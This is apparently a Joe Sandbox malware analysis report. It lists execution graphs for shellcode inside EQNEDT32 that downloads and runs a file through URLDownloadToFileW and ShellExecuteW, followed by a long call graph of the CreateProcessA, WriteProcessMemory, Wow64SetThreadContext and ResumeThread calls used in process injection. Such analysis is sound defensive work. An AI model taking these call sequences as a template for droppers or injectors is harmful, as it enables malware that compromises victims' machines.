                    Total number of Limit Nodes:6
                    execution_graph 305 34a0392 312 34a03cc 305->312 313 34a03d2 312->313 318 34a03e8 313->318 319 34a03ee 318->319 324 34a040f 319->324 325 34a0412 324->325 328 34a0481 325->328 329 34a0483 328->329 330 34a0496 13 API calls 329->330 331 34a0488 330->331 261 34a0481 262 34a0483 261->262 265 34a0496 LoadLibraryW 262->265 270 34a04b0 265->270 271 34a04b3 270->271 274 34a0539 URLDownloadToFileW 271->274 273 34a04c1 285 34a0552 274->285 276 34a0542 295 34a0567 276->295 278 34a0559 279 34a0561 ShellExecuteW 278->279 281 34a05c6 278->281 282 34a0580 279->282 302 34a058c 279->302 281->273 282->281 283 34a058f ExitProcess GetPEB 282->283 284 34a05a1 283->284 284->273 286 34a0554 285->286 287 34a0559 286->287 288 34a0567 5 API calls 286->288 289 34a0561 ShellExecuteW 287->289 292 34a05c6 287->292 288->287 290 34a0580 289->290 291 34a058c 2 API calls 289->291 290->292 293 34a058f ExitProcess GetPEB 290->293 291->290 292->276 294 34a05a1 293->294 294->276 296 34a056a ShellExecuteW 295->296 297 34a058c 2 API calls 296->297 299 34a0580 297->299 298 34a05c7 298->278 299->298 300 34a058f ExitProcess GetPEB 299->300 301 34a05a1 300->301 301->278 303 34a058f ExitProcess GetPEB 302->303 304 34a05a1 303->304 304->282

                    Callgraph

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 34a0539-34a055f URLDownloadToFileW call 34a0552 call 34a0567 6 34a0561-34a0579 ShellExecuteW 0->6 7 34a05c6-34a05d2 0->7 9 34a0580-34a0581 6->9 10 34a057b call 34a058c 6->10 8 34a05d5 7->8 13 34a05dd-34a05e1 8->13 14 34a05d7-34a05db 8->14 11 34a05ec-34a05f0 9->11 12 34a0583 9->12 10->9 17 34a05f2 11->17 18 34a05f4 11->18 12->8 19 34a0585 12->19 15 34a05e3-34a05e7 13->15 16 34a05f6-34a05f8 13->16 14->13 20 34a05e9 14->20 15->16 15->20 22 34a0608-34a0609 16->22 17->16 18->16 21 34a05fa-34a0603 18->21 19->16 23 34a0587-34a059e ExitProcess GetPEB 19->23 20->11 26 34a05cc-34a05cf 21->26 27 34a0605 21->27 30 34a05a1-34a05b2 call 34a05bb 23->30 26->21 29 34a05d1 26->29 27->22 29->8 33 34a05b4-34a05b8 30->33
                    APIs
                    • URLDownloadToFileW.URLMON(00000000,034A04C1,?,00000000,00000000,?,034A03F5,?,034A03D9,?,034A03BF), ref: 034A053B
                      • Part of subcall function 034A0552: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,034A03F5,?,034A03D9,?,034A03BF), ref: 034A0579
                      • Part of subcall function 034A0552: ExitProcess.KERNEL32(00000000,?,034A0580,?,034A03F5,?,034A03D9,?,034A03BF), ref: 034A0591
                    Memory Dump Source
                    • Source File: 00000002.00000002.454675403.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_34a0000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileProcessShell
                    • String ID:
                    • API String ID: 3584569557-0
                    • Opcode ID: 682a828850de97e377914c781cb73a453997874f56cb74464893f1649821102e
                    • Instruction ID: c76e0dcf1284a85fd74a77cbb31c5eaae670f0d47db480a1a3e8df2715a03bd8
                    • Opcode Fuzzy Hash: 682a828850de97e377914c781cb73a453997874f56cb74464893f1649821102e
                    • Instruction Fuzzy Hash: 76F027D168CB4029E6A1E37D0C8AF6B6E549FB2700F54088FF1414D0D3D8A48504861D

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 34 34a0567-34a0581 ShellExecuteW call 34a058c 38 34a05ec-34a05f0 34->38 39 34a0583 34->39 40 34a05f2 38->40 41 34a05f4 38->41 42 34a05d5 39->42 43 34a0585 39->43 45 34a05f6-34a05f8 40->45 44 34a05fa-34a0603 41->44 41->45 47 34a05dd-34a05e1 42->47 48 34a05d7-34a05db 42->48 43->45 46 34a0587-34a059e ExitProcess GetPEB 43->46 54 34a05cc-34a05cf 44->54 55 34a0605 44->55 50 34a0608-34a0609 45->50 58 34a05a1-34a05b2 call 34a05bb 46->58 47->45 49 34a05e3-34a05e7 47->49 48->47 53 34a05e9 48->53 49->45 49->53 53->38 54->44 57 34a05d1 54->57 55->50 57->42 61 34a05b4-34a05b8 58->61
                    APIs
                    • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,034A03F5,?,034A03D9,?,034A03BF), ref: 034A0579
                      • Part of subcall function 034A058C: ExitProcess.KERNEL32(00000000,?,034A0580,?,034A03F5,?,034A03D9,?,034A03BF), ref: 034A0591
                    Memory Dump Source
                    • Source File: 00000002.00000002.454675403.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_34a0000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID:
                    • API String ID: 1124553745-0
                    • Opcode ID: fc81e87bb45f5d1ff5a642aaa0739ac3116be62d6a46dbf0981e74fb7f47bcdc
                    • Instruction ID: 6bb19a29fa9a8b707940f1b1ad4cac409eddec4c526fb88851937310b1c83d71
                    • Opcode Fuzzy Hash: fc81e87bb45f5d1ff5a642aaa0739ac3116be62d6a46dbf0981e74fb7f47bcdc
                    • Instruction Fuzzy Hash: 7F01F9D9A84B4222DBF0E62C4C457BBAF55AF72710FCC884BA9910C2C5D55891C38A1E

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 62 34a0552-34a0554 64 34a0559-34a055f 62->64 65 34a0554 call 34a0567 62->65 66 34a0561-34a0579 ShellExecuteW 64->66 67 34a05c6-34a05d2 64->67 65->64 69 34a0580-34a0581 66->69 70 34a057b call 34a058c 66->70 68 34a05d5 67->68 73 34a05dd-34a05e1 68->73 74 34a05d7-34a05db 68->74 71 34a05ec-34a05f0 69->71 72 34a0583 69->72 70->69 77 34a05f2 71->77 78 34a05f4 71->78 72->68 79 34a0585 72->79 75 34a05e3-34a05e7 73->75 76 34a05f6-34a05f8 73->76 74->73 80 34a05e9 74->80 75->76 75->80 82 34a0608-34a0609 76->82 77->76 78->76 81 34a05fa-34a0603 78->81 79->76 83 34a0587-34a059e ExitProcess GetPEB 79->83 80->71 86 34a05cc-34a05cf 81->86 87 34a0605 81->87 90 34a05a1-34a05b2 call 34a05bb 83->90 86->81 89 34a05d1 86->89 87->82 89->68 93 34a05b4-34a05b8 90->93
                    Memory Dump Source
                    • Source File: 00000002.00000002.454675403.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_34a0000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID:
                    • API String ID: 1124553745-0
                    • Opcode ID: 9ea9d64166685971d3dcc532942d35d96e96ae5c80c2428ecaa48cd60edc3945
                    • Instruction ID: e8672b02c530e4489f40abad147139c6f15fad30fee4ab7b5d0b2e89d5dcb070
                    • Opcode Fuzzy Hash: 9ea9d64166685971d3dcc532942d35d96e96ae5c80c2428ecaa48cd60edc3945
                    • Instruction Fuzzy Hash: D6012DE5688B0535E7F0E63C4C85BAFAD85AFB2714F98845FF5900C1C1D6588543861D

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 94 34a0496-34a0498 LoadLibraryW call 34a04b0 96 34a049d-34a04a2 94->96 97 34a0512 96->97 98 34a04a4-34a04bb 96->98 101 34a0513-34a0537 97->101 99 34a04c1-34a0511 98->99 100 34a04bc call 34a0539 98->100 99->101 100->99
                    APIs
                    • LoadLibraryW.KERNEL32(034A0488,?,034A03F5,?,034A03D9,?,034A03BF), ref: 034A0496
                    Memory Dump Source
                    • Source File: 00000002.00000002.454675403.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_34a0000_EQNEDT32.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: fa66c11f60d910000f0e9bd6bd7aa0be54861b5444ed9b88b0b04b6dc80d2a9b
                    • Instruction ID: 6b5ef95cae93e4819e92bb47697c4243878a339822d95a5f4a3a8dae50dfb83e
                    • Opcode Fuzzy Hash: fa66c11f60d910000f0e9bd6bd7aa0be54861b5444ed9b88b0b04b6dc80d2a9b
                    • Instruction Fuzzy Hash: 9621F0A284DBC91FC723D6380D3E655BF212A23008B5DCACFD4C60E5A3A749A502D79B

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 109 34a058c-34a059e ExitProcess GetPEB 111 34a05a1-34a05b2 call 34a05bb 109->111 114 34a05b4-34a05b8 111->114
                    APIs
                    • ExitProcess.KERNEL32(00000000,?,034A0580,?,034A03F5,?,034A03D9,?,034A03BF), ref: 034A0591
                    Memory Dump Source
                    • Source File: 00000002.00000002.454675403.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_34a0000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                    • Instruction ID: 1bf2a9d178d965a99671550696ec7f9c3464d727b67f3ccf4d69a191f6259791
                    • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                    • Instruction Fuzzy Hash: 6ED017B1212A029FE244EB19CD84F27F76AFFE4721F14C269E5044F659D770E891CAA8

                    Execution Graph

                    Execution Coverage:17.2%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:939
                    Total number of Limit Nodes:11
                    execution_graph 17892 10204c2 17896 259870 17892->17896 17900 259868 17892->17900 17893 10204f6 17897 2598bc WriteProcessMemory 17896->17897 17899 25995b 17897->17899 17899->17893 17901 2598bc WriteProcessMemory 17900->17901 17903 25995b 17901->17903 17903->17893 18160 1010161 18161 1010095 18160->18161 18161->18160 18162 10100b0 18161->18162 18189 1011423 18161->18189 18194 1010a1a 18161->18194 18202 1010a5b 18161->18202 18207 1010e99 18161->18207 18212 10103d4 18161->18212 18217 1011014 18161->18217 18222 10111d4 18161->18222 18227 101088f 18161->18227 18232 10112cc 18161->18232 18240 101104d 18161->18240 18244 10109ca 18161->18244 18252 1010b09 18161->18252 18257 1011606 18161->18257 18263 1011544 18161->18263 18268 101073a 18161->18268 18272 1011177 18161->18272 18277 1010ef7 18161->18277 18282 1010d75 18161->18282 18287 10109ae 18161->18287 18292 1010dee 18161->18292 18300 10110ad 18161->18300 18305 101112b 18161->18305 18310 1010fa6 18161->18310 18315 1010d24 18161->18315 18320 10107e5 18161->18320 18325 1010f65 18161->18325 18190 10103ca 18189->18190 18192 259870 WriteProcessMemory 18190->18192 18193 259868 WriteProcessMemory 18190->18193 18191 10115dd 18191->18161 18192->18191 18193->18191 18195 10109f0 18194->18195 18196 10103ca 18195->18196 18330 1011ec1 18195->18330 18335 1011ed0 18195->18335 18200 259870 WriteProcessMemory 18196->18200 18201 259868 WriteProcessMemory 18196->18201 18197 10115dd 18197->18161 18200->18197 18201->18197 18203 10103ca 18202->18203 18205 259870 WriteProcessMemory 18203->18205 18206 259868 WriteProcessMemory 18203->18206 18204 10115dd 18204->18161 18205->18204 18206->18204 18208 10103ca 18207->18208 18210 259870 WriteProcessMemory 18208->18210 18211 259868 WriteProcessMemory 18208->18211 18209 10115dd 18209->18161 18210->18209 18211->18209 18213 10103ca 18212->18213 18215 259870 WriteProcessMemory 18213->18215 18216 259868 WriteProcessMemory 18213->18216 18214 10115dd 18214->18161 18215->18214 18216->18214 18218 10103ca 18217->18218 18220 259870 WriteProcessMemory 18218->18220 18221 259868 WriteProcessMemory 18218->18221 18219 10115dd 18219->18161 18220->18219 18221->18219 18223 10103ca 18222->18223 18225 259870 WriteProcessMemory 18223->18225 18226 259868 WriteProcessMemory 18223->18226 18224 10115dd 18224->18161 18225->18224 18226->18224 18228 10115b6 18227->18228 18230 259870 WriteProcessMemory 18228->18230 18231 259868 WriteProcessMemory 18228->18231 18229 10115dd 18229->18161 18230->18229 18231->18229 18233 1010e14 18232->18233 18234 10103ca 18232->18234 18236 1011ec1 2 API calls 18233->18236 18237 1011ed0 2 API calls 18233->18237 18238 259870 WriteProcessMemory 18234->18238 18239 259868 WriteProcessMemory 18234->18239 18235 10115dd 18235->18161 18236->18234 18237->18234 18238->18235 18239->18235 18242 259870 WriteProcessMemory 18240->18242 18243 259868 WriteProcessMemory 18240->18243 18241 1011077 18242->18241 18243->18241 18245 10109d4 18244->18245 18250 1011ec1 2 API calls 18245->18250 18251 1011ed0 2 API calls 18245->18251 18246 10103ca 18248 259870 WriteProcessMemory 18246->18248 18249 259868 WriteProcessMemory 18246->18249 18247 10115dd 18247->18161 18248->18247 18249->18247 18250->18246 18251->18246 18253 10103ca 18252->18253 18255 259870 WriteProcessMemory 18253->18255 18256 259868 WriteProcessMemory 18253->18256 18254 10115dd 18254->18161 18255->18254 18256->18254 18340 102f970 18257->18340 18258 10103ca 18260 259870 WriteProcessMemory 18258->18260 18261 259868 WriteProcessMemory 18258->18261 18259 10115dd 18259->18161 18260->18259 18261->18259 18264 10103ca 18263->18264 18266 259870 WriteProcessMemory 18264->18266 18267 259868 WriteProcessMemory 18264->18267 18265 10115dd 18265->18161 18266->18265 18267->18265 18270 259870 WriteProcessMemory 18268->18270 18271 259868 WriteProcessMemory 18268->18271 18269 101076e 18270->18269 18271->18269 18273 10103ca 18272->18273 18275 259870 WriteProcessMemory 18273->18275 18276 259868 WriteProcessMemory 18273->18276 18274 10115dd 18274->18161 18275->18274 18276->18274 18279 1010efb 18277->18279 18278 1010f7d 18279->18278 18344 1011e78 18279->18344 18349 1011e88 18279->18349 18283 10103ca 18282->18283 18285 259870 WriteProcessMemory 18283->18285 18286 259868 WriteProcessMemory 18283->18286 18284 10115dd 18284->18161 18285->18284 18286->18284 18288 10103ca 18287->18288 18290 259870 WriteProcessMemory 18288->18290 18291 259868 WriteProcessMemory 18288->18291 18289 10115dd 18289->18161 18290->18289 18291->18289 18293 1010df8 18292->18293 18296 1011ec1 2 API calls 18293->18296 18297 1011ed0 2 API calls 18293->18297 18294 10103ca 18298 259870 WriteProcessMemory 18294->18298 18299 259868 WriteProcessMemory 18294->18299 18295 10115dd 18295->18161 18296->18294 18297->18294 18298->18295 18299->18295 18301 10103ca 18300->18301 18303 259870 WriteProcessMemory 18301->18303 18304 259868 WriteProcessMemory 18301->18304 18302 10115dd 18302->18161 18303->18302 18304->18302 18306 10103ca 18305->18306 18306->18305 18308 259870 WriteProcessMemory 18306->18308 18309 259868 WriteProcessMemory 18306->18309 18307 10115dd 18307->18161 18308->18307 18309->18307 18311 10103ca 18310->18311 18313 259870 WriteProcessMemory 18311->18313 18314 259868 WriteProcessMemory 18311->18314 18312 10115dd 18312->18161 18313->18312 18314->18312 18316 10103ca 18315->18316 18318 259870 WriteProcessMemory 18316->18318 18319 259868 WriteProcessMemory 18316->18319 18317 10115dd 18317->18161 18318->18317 18319->18317 18321 10103ca 18320->18321 18321->18320 18323 259870 WriteProcessMemory 18321->18323 18324 259868 WriteProcessMemory 18321->18324 18322 10115dd 18322->18161 18323->18322 18324->18322 18326 1010f6b 18325->18326 18327 1010f7d 18326->18327 18328 1011e78 2 API calls 18326->18328 18329 1011e88 2 API calls 18326->18329 18328->18327 18329->18327 18331 1011ee5 18330->18331 18333 259521 ResumeThread 18331->18333 18334 259528 ResumeThread 18331->18334 18332 1011ef8 18332->18196 18333->18332 18334->18332 18336 1011ee5 18335->18336 18338 259521 ResumeThread 18336->18338 18339 259528 ResumeThread 18336->18339 18337 1011ef8 18337->18196 18338->18337 18339->18337 18341 102f9f7 CreateProcessA 18340->18341 18343 102fc5d 18341->18343 18345 1011e9d 18344->18345 18346 1011eb3 18345->18346 18347 259610 Wow64SetThreadContext 18345->18347 18348 259618 Wow64SetThreadContext 18345->18348 18346->18278 18347->18346 18348->18346 18350 1011e9d 18349->18350 18351 1011eb3 18350->18351 18352 259610 Wow64SetThreadContext 18350->18352 18353 259618 Wow64SetThreadContext 18350->18353 18351->18278 18352->18351 18353->18351 18354 10221a0 18356 10221c7 18354->18356 18355 1022211 18356->18355 18358 1024907 18356->18358 18359 102492d 18358->18359 18362 1025751 18359->18362 18363 1025685 18362->18363 18363->18362 18364 102493f 18363->18364 18390 102600a 18363->18390 18398 10259c4 18363->18398 18406 1026604 18363->18406 18414 10267c4 18363->18414 18422 102663d 18363->18422 18426 10268bc 18363->18426 18434 1025e7f 18363->18434 18439 1025fba 18363->18439 18447 1026b34 18363->18447 18455 1026bf6 18363->18455 18465 1025d2a 18363->18465 18469 1026365 18363->18469 18477 10264e7 18363->18477 18482 1026767 18363->18482 18490 102669d 18363->18490 18498 1025f9e 18363->18498 18506 10263de 18363->18506 18514 102671b 18363->18514 18522 1026555 18363->18522 18527 1025dd5 18363->18527 18535 1026314 18363->18535 18543 1026596 18363->18543 18551 1026a13 18363->18551 18559 1026489 18363->18559 18567 102604b 18363->18567 18364->18356 18391 10259ba 18390->18391 18392 1026b7f 18391->18392 18575 10274b0 18391->18575 18580 10274c0 18391->18580 18396 259870 WriteProcessMemory 18392->18396 18397 259868 WriteProcessMemory 18392->18397 18393 1026bcd 18393->18363 18396->18393 18397->18393 18399 10259ba 18398->18399 18400 1026b7f 18399->18400 18404 10274b0 2 API calls 18399->18404 18405 10274c0 2 API calls 18399->18405 18402 259870 WriteProcessMemory 18400->18402 18403 259868 WriteProcessMemory 18400->18403 18401 1026bcd 18401->18363 18402->18401 18403->18401 18404->18399 18405->18399 18407 10259ba 18406->18407 18408 1026b7f 18407->18408 18412 10274b0 2 API calls 18407->18412 18413 10274c0 2 API calls 18407->18413 18410 259870 WriteProcessMemory 18408->18410 18411 259868 WriteProcessMemory 18408->18411 18409 1026bcd 18409->18363 18410->18409 18411->18409 18412->18407 18413->18407 18415 10259ba 18414->18415 18416 1026b7f 18415->18416 18420 10274b0 2 API calls 18415->18420 18421 10274c0 2 API calls 18415->18421 18418 259870 WriteProcessMemory 18416->18418 18419 259868 WriteProcessMemory 18416->18419 18417 1026bcd 18417->18363 18418->18417 18419->18417 18420->18415 18421->18415 18424 259870 WriteProcessMemory 18422->18424 18425 259868 WriteProcessMemory 18422->18425 18423 1026667 18424->18423 18425->18423 18427 10259ba 18426->18427 18428 1026b7f 18427->18428 18430 10274b0 2 API calls 18427->18430 18431 10274c0 2 API calls 18427->18431 18432 259870 WriteProcessMemory 18428->18432 18433 259868 WriteProcessMemory 18428->18433 18429 1026bcd 18429->18363 18430->18427 18431->18427 18432->18429 18433->18429 18435 1026ba6 18434->18435 18437 259870 WriteProcessMemory 18435->18437 18438 259868 WriteProcessMemory 18435->18438 18436 1026bcd 18436->18363 18437->18436 18438->18436 18440 10259ba 18439->18440 18441 1026b7f 18440->18441 18443 10274b0 2 API calls 18440->18443 18444 10274c0 2 API calls 18440->18444 18445 259870 WriteProcessMemory 18441->18445 18446 259868 WriteProcessMemory 18441->18446 18442 1026bcd 18442->18363 18443->18440 18444->18440 18445->18442 18446->18442 18448 10259ba 18447->18448 18449 1026b7f 18448->18449 18451 10274b0 2 API calls 18448->18451 18452 10274c0 2 API calls 18448->18452 18453 259870 WriteProcessMemory 18449->18453 18454 259868 WriteProcessMemory 18449->18454 18450 1026bcd 18450->18363 18451->18448 18452->18448 18453->18450 18454->18450 18585 1025184 18455->18585 18589 1025190 18455->18589 18467 259870 WriteProcessMemory 18465->18467 18468 259868 WriteProcessMemory 18465->18468 18466 1025d5e 18467->18466 18468->18466 18470 10259ba 18469->18470 18471 1026b7f 18470->18471 18475 10274b0 2 API calls 18470->18475 18476 10274c0 2 API calls 18470->18476 18473 259870 WriteProcessMemory 18471->18473 18474 259868 WriteProcessMemory 18471->18474 18472 1026bcd 18472->18363 18473->18472 18474->18472 18475->18470 18476->18470 18479 10264eb 18477->18479 18478 102656d 18593 1027478 18479->18593 18598 1027469 18479->18598 18483 10259ba 18482->18483 18484 1026b7f 18483->18484 18488 10274b0 2 API calls 18483->18488 18489 10274c0 2 API calls 18483->18489 18486 259870 WriteProcessMemory 18484->18486 18487 259868 WriteProcessMemory 18484->18487 18485 1026bcd 18485->18363 18486->18485 18487->18485 18488->18483 18489->18483 18491 10259ba 18490->18491 18492 1026b7f 18491->18492 18496 10274b0 2 API calls 18491->18496 18497 10274c0 2 API calls 18491->18497 18494 259870 WriteProcessMemory 18492->18494 18495 259868 WriteProcessMemory 18492->18495 18493 1026bcd 18493->18363 18494->18493 18495->18493 18496->18491 18497->18491 18499 10259ba 18498->18499 18500 1026b7f 18499->18500 18502 10274b0 2 API calls 18499->18502 18503 10274c0 2 API calls 18499->18503 18504 259870 WriteProcessMemory 18500->18504 18505 259868 WriteProcessMemory 18500->18505 18501 1026bcd 18501->18363 18502->18499 18503->18499 18504->18501 18505->18501 18507 10259ba 18506->18507 18508 1026b7f 18507->18508 18512 10274b0 2 API calls 18507->18512 18513 10274c0 2 API calls 18507->18513 18510 259870 WriteProcessMemory 18508->18510 18511 259868 WriteProcessMemory 18508->18511 18509 1026bcd 18509->18363 18510->18509 18511->18509 18512->18507 18513->18507 18515 10259ba 18514->18515 18516 1026b7f 18515->18516 18520 10274b0 2 API calls 18515->18520 18521 10274c0 2 API calls 18515->18521 18518 259870 WriteProcessMemory 18516->18518 18519 259868 WriteProcessMemory 18516->18519 18517 1026bcd 18517->18363 18518->18517 18519->18517 18520->18515 18521->18515 18523 102655b 18522->18523 18525 1027478 2 API calls 18523->18525 18526 1027469 2 API calls 18523->18526 18524 102656d 18525->18524 18526->18524 18528 10259ba 18527->18528 18528->18527 18529 1026b7f 18528->18529 18531 10274b0 2 API calls 18528->18531 18532 10274c0 2 API calls 18528->18532 18533 259870 WriteProcessMemory 18529->18533 18534 259868 WriteProcessMemory 18529->18534 18530 1026bcd 18530->18363 18531->18528 18532->18528 18533->18530 18534->18530 18536 10259ba 18535->18536 18537 1026b7f 18536->18537 18541 10274b0 2 API calls 18536->18541 18542 10274c0 2 API calls 18536->18542 18539 259870 WriteProcessMemory 18537->18539 18540 259868 WriteProcessMemory 18537->18540 18538 1026bcd 18538->18363 18539->18538 18540->18538 18541->18536 18542->18536 18544 10259ba 18543->18544 18545 1026b7f 18544->18545 18549 10274b0 2 API calls 18544->18549 18550 10274c0 2 API calls 18544->18550 18547 259870 WriteProcessMemory 18545->18547 18548 259868 WriteProcessMemory 18545->18548 18546 1026bcd 18546->18363 18547->18546 18548->18546 18549->18544 18550->18544 18552 10259ba 18551->18552 18553 1026b7f 18552->18553 18557 10274b0 2 API calls 18552->18557 18558 10274c0 2 API calls 18552->18558 18555 259870 WriteProcessMemory 18553->18555 18556 259868 WriteProcessMemory 18553->18556 18554 1026bcd 18554->18363 18555->18554 18556->18554 18557->18552 18558->18552 18560 10259ba 18559->18560 18561 1026b7f 18560->18561 18565 10274b0 2 API calls 18560->18565 18566 10274c0 2 API calls 18560->18566 18563 259870 WriteProcessMemory 18561->18563 18564 259868 WriteProcessMemory 18561->18564 18562 1026bcd 18562->18363 18563->18562 18564->18562 18565->18560 18566->18560 18568 10259ba 18567->18568 18569 1026b7f 18568->18569 18573 10274b0 2 API calls 18568->18573 18574 10274c0 2 API calls 18568->18574 18571 259870 WriteProcessMemory 18569->18571 18572 259868 WriteProcessMemory 18569->18572 18570 1026bcd 18570->18363 18571->18570 18572->18570 18573->18568 18574->18568 18576 10274d5 18575->18576 18578 259521 ResumeThread 18576->18578 18579 259528 ResumeThread 18576->18579 18577 10274e8 18577->18391 18578->18577 18579->18577 18581 10274d5 18580->18581 18583 259521 ResumeThread 18581->18583 18584 259528 ResumeThread 18581->18584 18582 10274e8 18582->18391 18583->18582 18584->18582 18586 1025217 CreateProcessA 18585->18586 18588 102547d 18586->18588 18590 1025217 CreateProcessA 18589->18590 18592 102547d 18590->18592 18594 102748d 18593->18594 18596 259610 Wow64SetThreadContext 18594->18596 18597 259618 Wow64SetThreadContext 18594->18597 18595 10274a3 18595->18478 18596->18595 18597->18595 18599 102748d 18598->18599 18601 259610 Wow64SetThreadContext 18599->18601 18602 259618 Wow64SetThreadContext 18599->18602 18600 10274a3 18600->18478 18601->18600 18602->18600 17904 1012282 17905 101228f 17904->17905 17907 1011ff6 17904->17907 17906 1012011 17907->17906 17909 1014708 17907->17909 17910 101472d 17909->17910 17913 1015549 17910->17913 17914 101547d 17913->17914 17914->17913 17915 101473f 17914->17915 17942 1015bcd 17914->17942 17947 101680b 17914->17947 17952 1015e02 17914->17952 17960 1015e43 17914->17960 17965 1016281 17914->17965 17970 10157bc 17914->17970 17975 10165bc 17914->17975 17980 10163fc 17914->17980 17985 1015c77 17914->17985 17990 10166b4 17914->17990 17998 1016435 17914->17998 18002 1015db2 17914->18002 18010 1015ef1 17914->18010 18015 10169ee 17914->18015 18022 101692c 17914->18022 18027 1015b22 17914->18027 18031 10162df 17914->18031 18036 101655f 17914->18036 18041 101615d 17914->18041 18046 1015d96 17914->18046 18051 10161d6 17914->18051 18059 1016495 17914->18059 18064 1016513 17914->18064 18069 101638e 17914->18069 18074 101610c 17914->18074 18079 101634d 17914->18079 17915->17907 17943 10157b2 17942->17943 17943->17942 17945 259870 WriteProcessMemory 17943->17945 17946 259868 WriteProcessMemory 17943->17946 17944 10169c5 17944->17914 17945->17944 17946->17944 17948 10157b2 17947->17948 17950 259870 WriteProcessMemory 17948->17950 17951 259868 WriteProcessMemory 17948->17951 17949 10169c5 17949->17914 17950->17949 17951->17949 17953 1015dd8 17952->17953 17954 10157b2 17953->17954 18084 10172a8 17953->18084 18089 10172b8 17953->18089 17956 259870 WriteProcessMemory 17954->17956 17957 259868 WriteProcessMemory 17954->17957 17955 10169c5 17955->17914 17956->17955 17957->17955 17961 10157b2 17960->17961 17963 259870 WriteProcessMemory 17961->17963 17964 259868 WriteProcessMemory 17961->17964 17962 10169c5 17962->17914 17963->17962 17964->17962 17966 10157b2 17965->17966 17968 259870 WriteProcessMemory 17966->17968 17969 259868 WriteProcessMemory 17966->17969 17967 10169c5 17967->17914 17968->17967 17969->17967 17971 10157b2 17970->17971 17973 259870 WriteProcessMemory 17971->17973 17974 259868 WriteProcessMemory 17971->17974 17972 10169c5 17972->17914 17973->17972 17974->17972 17976 10157b2 17975->17976 17978 259870 WriteProcessMemory 17976->17978 17979 259868 WriteProcessMemory 17976->17979 17977 10169c5 17977->17914 17978->17977 17979->17977 17981 10157b2 17980->17981 17983 259870 WriteProcessMemory 17981->17983 17984 259868 WriteProcessMemory 17981->17984 17982 10169c5 17982->17914 17983->17982 17984->17982 17986 101699e 17985->17986 17988 259870 WriteProcessMemory 17986->17988 17989 259868 WriteProcessMemory 17986->17989 17987 10169c5 17987->17914 17988->17987 17989->17987 17991 10161fc 17990->17991 17992 10157b2 17990->17992 17994 10172a8 2 API calls 17991->17994 17995 10172b8 2 API calls 17991->17995 17996 259870 WriteProcessMemory 17992->17996 17997 259868 WriteProcessMemory 17992->17997 17993 10169c5 17993->17914 17994->17992 17995->17992 17996->17993 17997->17993 18000 259870 WriteProcessMemory 17998->18000 18001 259868 WriteProcessMemory 17998->18001 17999 101645f 18000->17999 18001->17999 18003 1015dbc 18002->18003 18006 10172a8 2 API calls 18003->18006 18007 10172b8 2 API calls 18003->18007 18004 10157b2 18008 259870 WriteProcessMemory 18004->18008 18009 259868 WriteProcessMemory 18004->18009 18005 10169c5 18005->17914 18006->18004 18007->18004 18008->18005 18009->18005 18011 10157b2 18010->18011 18013 259870 WriteProcessMemory 18011->18013 18014 259868 WriteProcessMemory 18011->18014 18012 10169c5 18012->17914 18013->18012 18014->18012 18102 1014f88 18015->18102 18106 1014f7d 18015->18106 18016 10157b2 18018 259870 WriteProcessMemory 18016->18018 18019 259868 WriteProcessMemory 18016->18019 18017 10169c5 18017->17914 18018->18017 18019->18017 18023 10157b2 18022->18023 18025 259870 WriteProcessMemory 18023->18025 18026 259868 WriteProcessMemory 18023->18026 18024 10169c5 18024->17914 18025->18024 18026->18024 18029 259870 WriteProcessMemory 18027->18029 18030 259868 WriteProcessMemory 18027->18030 18028 1015b56 18029->18028 18030->18028 18032 10162e3 18031->18032 18110 1017260 18032->18110 18115 1017270 18032->18115 18033 1016365 18037 10157b2 18036->18037 18039 259870 WriteProcessMemory 18037->18039 18040 259868 WriteProcessMemory 18037->18040 18038 10169c5 18038->17914 18039->18038 18040->18038 18042 10157b2 18041->18042 18044 259870 WriteProcessMemory 18042->18044 18045 259868 WriteProcessMemory 18042->18045 18043 10169c5 18043->17914 18044->18043 18045->18043 18047 10157b2 18046->18047 18049 259870 WriteProcessMemory 18047->18049 18050 259868 WriteProcessMemory 18047->18050 18048 10169c5 18048->17914 18049->18048 18050->18048 18052 10161e0 18051->18052 18055 10172a8 2 API calls 18052->18055 18056 10172b8 2 API calls 18052->18056 18053 10157b2 18057 259870 WriteProcessMemory 18053->18057 18058 259868 WriteProcessMemory 18053->18058 18054 10169c5 18054->17914 18055->18053 18056->18053 18057->18054 18058->18054 18060 10157b2 18059->18060 18062 259870 WriteProcessMemory 18060->18062 18063 259868 WriteProcessMemory 18060->18063 18061 10169c5 18061->17914 18062->18061 18063->18061 18065 10157b2 18064->18065 18067 259870 WriteProcessMemory 18065->18067 18068 